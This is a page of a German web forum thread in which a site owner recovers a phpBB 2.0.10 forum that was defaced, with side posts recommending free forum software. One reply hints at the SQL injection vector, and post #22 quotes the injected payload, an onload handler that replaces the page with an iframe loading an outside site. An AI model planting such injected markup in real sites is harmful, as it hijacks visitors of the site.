Domain gehäckt!

Einklappen
X
Einklappen
 
  • Seite von 2
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige 1 2 template Weiter
  • #16
    Original geschrieben von LukasS
    leider ist das Schreiben von Privaten Nachrichten ausgeschaltet deshalb hänge ich mieine Frage einfach kurz hier an:

    Was würdest Du denn als kostenlose alternative zu phpBB empfelen?
    Ich bin zwar nicht gefragt, aber ich empfehle dir das Woltlab Burning Board (Lite).

    Lite ist kostenlos, doch rentieren sich die 25€
    www.woltlab.de

    Gruß
    icecream
    icedcream.de Webdesign Regensburg

    Kommentar

    • #17
      Original geschrieben von LukasS
      Was würdest Du denn als kostenlose alternative zu phpBB empfelen?
      Für kleine Seiten: Vanilla
      Für mittlere Seiten: PunBB
      Und für größere Seiten gibt's kostenlos nicht so wirklich gute Foren, aber mir fallen spontan SMF und FudForum ein wobei letzteres als Besonderheit die Integration in Mailinglisten bietet (dafür allerdings ziemlich schlecht aussieht).
      Das kommerzielle Non-Plus-Ultra ist IMHO das Invision Power Board.
      hopka.net!

      Kommentar

      • #18
        (a) warum ist das Ding noch online, hast Du kein ftp um den index.php zu renamen ? (nicht löschen, sondern allenfalls runterkopieren und ersetzen, wenn rename nicht geht).

        (b) welche Version von php88? Meines Wissens hatten Versionen bis 2.0.10 ein Loch mit Santy-Worm, das war aber vor einem Jahr, um December 22, 2004.

        (c)wie es geht? viewtopic.php?%2527...... als Grundidee, dazu ein bisschen magic_quotes und evtl. noch register_globals....

        Added: In der Tat, www.web-sniffer.net (Danke für den Link!!!) sagt:
        PoweredbyphpBB2.0.10line,withphpBBlinkedtowww.phpbb.com.Ifyourefuse
        Zuletzt geändert von globqluqqlo; 11.03.2006, 01:09.

        Kommentar

        • #19
          Original geschrieben von globqluqqlo
          (a) warum ist das Ding noch online, hast Du kein ftp um den index.php zu renamen ? (nicht löschen, sondern allenfalls runterkopieren und ersetzen, wenn rename nicht geht).
          ja werd ich umbedingt tun müssen...
          (b) welche Version von php88? Meines Wissens hatten Versionen bis 2.0.10 ein Loch mit Santy-Worm, das war aber vor einem Jahr, um December 22, 2004.
          leider gerade die 2.0.10
          (c)wie es geht? viewtopic.php?%2527...... als Grundidee.
          interessant, weiter?

          ich werde die neue 2.0.19 installieren müssen und die db mit der alte überschreiben, in der hoffnung dass die beiträge nicht verloren gehen und dass in der 2.0.19 diese sicherheitslücke beseitigt ist.
          In Flames - Pinbal Map
          Becoming the Archetype - No Fall Too Far
          Pantera

          Kommentar

          • #20
            ich werde die neue 2.0.19 installieren müssen und die db mit der alte überschreiben, in der hoffnung dass die beiträge nicht verloren gehen und dass in der 2.0.19 diese sicherheitslücke beseitigt ist.
            Das Sicherheitsloch ist damals auch von Heise berichtet worden, das ist mit Sicherheit weg... ;D
            Du solltest übrigens grundsätzlich immer nach Sicherheitsupdates ausschau halten und diese installieren....!
            Für alle die Fehler suchen, gibts gratis tolle Debuggingmöglichkeiten:
            var_dump(), print_r(), debug_backtrace und echo.
            Außerdem gibt es für unsere Neueinsteiger ein hervorragendes PHP Tutorial zu PHP 4 und PHP 5 (OOP)
            Es heißt $array['index'] und nicht $array[index]! Und nein, das ist nicht egal!
            Dieses Thema lesen, um Ärger im Forum und verzögerte Hilfen zu vermeiden.

            Kommentar

            • #21
              Original geschrieben von Shurakai
              Das Sicherheitsloch ist damals auch von Heise berichtet worden, das ist mit Sicherheit weg... ;D
              Du solltest übrigens grundsätzlich immer nach Sicherheitsupdates ausschau halten und diese installieren....!
              Naja, so sicher, dass es weg ist, kann man nicht sein. Und auch immer die neusten Sicherheitsupdates zu installieren ist nicht immer richtig.

              Bei phpBB ist es nämlich Tradition, bereits behobene Sicherheitslücken mit neuen Versionen wieder einzubauen.
              hopka.net!

              Kommentar

              • #22
                iframe

                So, endlich geschafft!

                War eigentlich eine kleine sache mit große wirkung gewesen.
                In der tat lag die sicherheitslücke im phpBB Forum (v. 2.0.10), durch injection
                haben die hacker zwei datensätze in der DB manipuliert und mit einem iframe die seite umgeleitet:

                PHP-Code:
                <body onload="document.body.innerHTML='<iframe scrolling=no frameborder=0 width=100% height=100% 
                src=http://www.ayyildiz.org/yusuf.htm></iframe>';"
                Eine echte sauerei! Ich habe nun das Forum auf 2.0.19 geupdatet und wieder eingerichet mal sehen wie lange
                die Version noch hält bis zum nächsten angriff.
                Der "Kunde" ist erstmal zufrieden dass das forum wieder läuft und dass die daten nicht verloren gegangen sind.

                Danke an alle für eure ansätze.

                Gruß

                Pippo
                In Flames - Pinbal Map
                Becoming the Archetype - No Fall Too Far
                Pantera

                Kommentar

                • #23
                  Danke fürs posting. Was für zwei Datensätze?

                  Kommentar

                  • #24
                    Original geschrieben von globqluqqlo
                    Danke fürs posting. Was für zwei Datensätze?
                    das war in der tabelle config, lieber nicht zu ins detail zu gehen, nicht
                    dass jemand auf dumme gedanke kommen könhnte.
                    In Flames - Pinbal Map
                    Becoming the Archetype - No Fall Too Far
                    Pantera

                    Kommentar

                    Vorherige 1 2 template Weiter
                    Lädt...
                    X